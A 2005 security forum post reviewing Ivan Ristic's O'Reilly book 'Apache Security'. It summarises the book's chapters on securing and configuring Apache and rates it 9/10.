Trusted SF Member
Joined: 26 Aug 2003
Location: Warwickshire, England, UK
|Posted: Sat Aug 27, 2005 4:53 pm Post subject: Book Review - Apache Security
Author(s): Ivan Ristic
Publisher: O'Reilly http://www.oreilly.com
Date Published: March 2005
Book Specifications: Softcover, 396 pages
Category: Web / Security
Publisher's Suggested User Level: None
Reviewer's Recommended User Level: Server Administrator / Web Programmer
Suggested Publisher Price: $34.95 US / $48.95 CAN
Info from back cover:
The Apache web server dominates the market, and its popularity continues to grow. While there is a lot of documentation for installing, configuring, and maintaining Apache, there is far less on the complex subject of securing it. Apache Security is the comprehensive book you've been looking for.
Apache Security is an invaluable source of information, whether you're a system administrator responsible for the security of the sites you administer, a programmer who wants to create secure applications, a system architect who needs to understand how system design decisions affect security, or a web security professional.
Apache Security covers the full range of web security topics, with descriptions of those specific to Apache, as well as guidance and references for related topics. You'll find detailed recommendations for all aspects of securing both the 1.3 and 2.0 versions of Apache.
Apache is the most widely used web server on the Internet, serving a huge majority of sites, many of which are in high demand, or offering critical services. The security of such servers is paramount to the success of the organisations running them, and with new vulnerabilities and attacks being discovered every day, the task of securing a web server is complex and time consuming.
This book guides the reader through the many aspects of Apache security, recommending solutions and detailing the issues surrounding them.
Chapter Synopsis & Review Comments
The book opens with a look at the principles of Apache security. It includes an explanation of threat modelling and details some of the various ways in which a system can be viewed, notably the user view and the network view. This chapter serves to introduce the concepts used throughout the book.
In chapter 2, the author walks through the installation and configuration of Apache. The chapter takes a critical approach to installation and configuration, focussing on security throughout, and recommending points during the install or configuration procedure at which security can be enhanced. A discussion of chrooting Apache is also included.
PHP is the topic of chapter 3. As the most popular web scripting language, PHP and Apache are often deployed together, and this chapter explains where PHP's security faults lie, and how best to configure your system to prevent these being exploited.
Chapter 4 discusses SSL (Secure Sockets Layer) and TLS (Transport Layer Security), the protocols which wrap HTTP to provide encrypted HTTP communications. As is typical for books which discuss encryption in the real world, the chapter opens with an overview of the cryptography behind SSL and TLS. OpenSSL is covered in this chapter, and a discussion of Apache mod_ssl ends the chapter.
Chapter 5 marks the point at which the book deviates from "install and configure" to looking at the threats faced by an in-production Apache server, and the ways in which they can be prevented. Of course, many of the solutions require changes to the configuration (or the installation itself), so the book does not completely lose the configuration topic at this point. In chapter 5, Denial of Service attacks are explained, along with a section on the infamous Slashdot Effect, the huge traffic spike caused when an article on an external server is linked from the main Slashdot page. The chapter also looks at some Apache-specific problems.
In chapter 6, the delicate topic of shared hosting is brought to the surface. The problems with sharing hosting on a single Apache server are numerous, and often result in the potential for users to access each others files. Chapter 6 explains how such eventualities arise, and what a server administrator can do to prevent them. Per-user chrooting is covered in this chapter, as are execution wrappers (such as suEXEC) and FastCGI.
Chapter 7 looks at access control, authentication and Single Sign-On, while Chapter 8 discusses the ever-important topics of logging and monitoring, log manipulation, remote logging and analysis, integrity and event monitoring, and server status monitoring.
Chapter 9 brings up the topic of Infrastructure; isolating applications, securing hosts and networks, the use of a reverse proxy (which Apache can be configured to work as) and network design.
Chapter 10 discusses Web Application Security. This chapter looks at session management, attacks on clients, application logic flaws, information disclosure, file disclosure, SQL injection, XSS (Cross-Site Scripting), command execution, buffer overflows, and IDS (Intrusion Detection System) evasion techniques.
Chapter 11 handles the topic of security assessment; testing an environment for security, while chapter 12 discusses web intrusion detection, and looks at Apache mod_security.
Style and Detail
The author of this book wrote the mod_security Apache module, and is clearly suited to the task of writing a book on Apache security. The content of the book is clear and precise, giving a balanced discussion of the problems faced by Apache server administrators, and the solutions they can employ, where any exist.
There is something in this book for everyone running an Apache server, regardless of the environment in which they run it. Users running a small web server from home will benefit from the first chapters, detailing how to install Apache in a more secure configuration, whilst professional hosting managers will benefit from the discussions of shared hosting techniques later in the book.
This is the sort of book that can be read in a variety of ways; the reader could pick it up and read it cover-to-cover, gaining a wealth of knowledge, and coming back to specific sections for reference as and when needed, or the book could be read in individual chapters, one at a time, in pretty much any order. The chapters are self-contained, but the effect of the book as a whole is to bring these individual topics together in such a way as to highlight the best approaches to securing the Apache web server.
The readability and accuracy of the content in this book, together with the relaxed writing style and self-contained chapters make this book ideal for anyone wishing to learn more about Apache security. It can be read first in a "tutorial" style, and later used as a reference manual for individual aspects of Apache security.
The only fault with this book is that, in cases where more than one solution for a security problem exists, the author has often chosen the one or two he thinks best. Whilst this is good in that it recommends those as the better solutions, they do not fit every situation, and a brief discussion of some of the alternatives (they are often mentioned by name, but little else is given) would have finished this book and given it a 10 on the SFDC review scale. Currently, this book scores a well-deserved 9, and would be a 9.5 if half-marks were available!
This book receives an honoured SFDC Rating of 9/10.
Keywords: Apache, security, chroot, mod_ssl, mod_security, logging, shared hosting, php, denial of service, ssl, tls, access control, http, httpd
This review is copyright 2005 by the author, Andrew J. Bennieston, and Security-Forums Dot Com, and may not be reproduced in any form in any media without the express permission of the author, or Security-Forums Dot Com.